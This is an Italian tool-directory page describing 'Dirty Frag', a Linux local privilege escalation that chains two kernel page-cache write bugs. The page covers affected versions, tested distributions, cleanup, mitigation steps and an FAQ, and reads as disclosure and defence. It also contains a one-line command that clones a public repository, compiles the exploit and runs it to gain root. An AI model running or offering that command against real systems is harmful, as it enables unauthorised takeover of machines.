Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-43284 | Kitploit
Strumenti/GitHubGitHub/frosterdl/cve-2026-43284
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitApprendimento e FormazioneBinary Exploitation
GitHubfrosterdl/cve-2026-43284

CVE-2026-43284

Vedi Repository
3 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Dirty Frag: LPE universale su Linux

Sommario

Questo documento spiega la classe di vulnerabilità Dirty Frag, scoperta e segnalata da Hyunwoo Kim (@v4bel). Combinando xfrm-ESP Page-Cache Write (CVE-2026-43284) con RxRPC Page-Cache Write (CVE-2026-43500), un attaccante può elevare i propri privilegi a root sulle principali distribuzioni Linux.

Dirty Frag appartiene alla stessa famiglia di bug di Dirty Pipe e Copy Fail. È un bug logico deterministico che non dipende da finestre di temporizzazione o race condition, non causa kernel panic in caso di fallimento e ha un tasso di successo molto elevato quando viene sfruttato.

Per i dettagli tecnici completi e la timeline della divulgazione, consultare il write-up allegato (non incluso in questo repository).

  • xfrm-ESP Page-Cache Write (CVE-2026-43284) è stato corretto nel mainline al commit f4c50a4034e6.
  • RxRPC Page-Cache Write (CVE-2026-43500) è stato corretto nel mainline al commit aa54b1d27fe0.

[!NOTE] Quando questo documento è stato pubblicato per la prima volta (2026-05-07), l'embargo era già stato violato esternamente. In quel momento non era disponibile alcuna patch pubblica o CVE. Dopo discussioni con i maintainer su [email protected], la divulgazione di Dirty Frag è stata pubblicata. Consultare il write-up tecnico per la timeline.

Sfruttamento

Comando rapido in una riga

root@kitploit:~
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

Questo PoC è condiviso a scopo informativo dopo il coordinamento con linux-distros. Non eseguirlo su sistemi che non sei autorizzato a testare.

Pulizia

⚠️ Importante: L'esecuzione dell'exploit inquina la page cache. Per ripristinare uno stato pulito, esegui uno dei seguenti comandi:

root@kitploit:~
echo 3 > /proc/sys/vm/drop_caches

oppure riavvia la macchina.

Versioni interessate

  • CVE-2026-43284: la scrittura xfrm-ESP Page-Cache è presente da cac2661c53f3 (2017-01-17) fino a f4c50a4034e6 (2026-05-05).
  • CVE-2026-43500: la scrittura RxRPC Page-Cache è presente da 2dc334f1a63a (2023-06-08) fino a aa54b1d27fe0 (2026-05-10).

In pratica, queste vulnerabilità coprono un arco di circa nove anni.

Le versioni delle distribuzioni testate includono:

  • Ubuntu 24.04.4: 6.17.0-23-generic
  • RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
  • openSUSE Tumbleweed: 7.0.2-1-default
  • CentOS Stream 10: 6.12.0-224.el10.x86_64
  • AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
  • Fedora 44: 6.19.14-300.fc44.x86_64
  • ...

Mitigazione

  1. Per rimuovere i moduli interessati e pulire la page cache, esegui:
root@kitploit:~
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"
  1. Applica i backport delle distribuzioni o le patch dei vendor appena disponibili.

FAQ

Perché combinare due vulnerabilità?

xfrm-ESP Page-Cache Write offre una primitiva STORE arbitraria di 4 byte molto efficace, simile a Copy Fail, ed è disponibile su molte distribuzioni, ma richiede privilegi per creare un namespace.

Ubuntu potrebbe limitare la creazione di user namespace non privilegiati tramite AppArmor, impedendo l'attivazione di xfrm-ESP. RxRPC Page-Cache Write non richiede privilegi per la creazione di namespace, ma il modulo rxrpc.ko non è presente di default su molte distribuzioni. Su Ubuntu, tuttavia, rxrpc.ko viene tipicamente caricato.

La combinazione dei due copre le rispettive lacune, consentendo di ottenere root su tutte le principali distribuzioni. Consultare il write-up tecnico per i dettagli.

Un'altra serie "Dirty" "marchiata"?

Sì — Dirty Frag è correlato a "Dirty Pipe", e il nome riflette il fatto che la classe di bug altera il membro frag della struct sk_buff.

Relazione con "Copy Fail"?

Copy Fail ha ispirato questa ricerca. La scrittura xfrm-ESP Page-Cache nella catena Dirty Frag condivide lo stesso sink di Copy Fail, ma si attiva anche quando è presente la mitigazione algif_aead. Pertanto, i sistemi induriti contro Copy Fail potrebbero essere ancora vulnerabili a Dirty Frag.

Come posso correggere il mio Linux?

Segui i passaggi nella sezione Mitigazione qui sopra.

Contatti

Manutentore: https://linkedin.com/in/tahamuhammadshafiq

Scarica lo strumento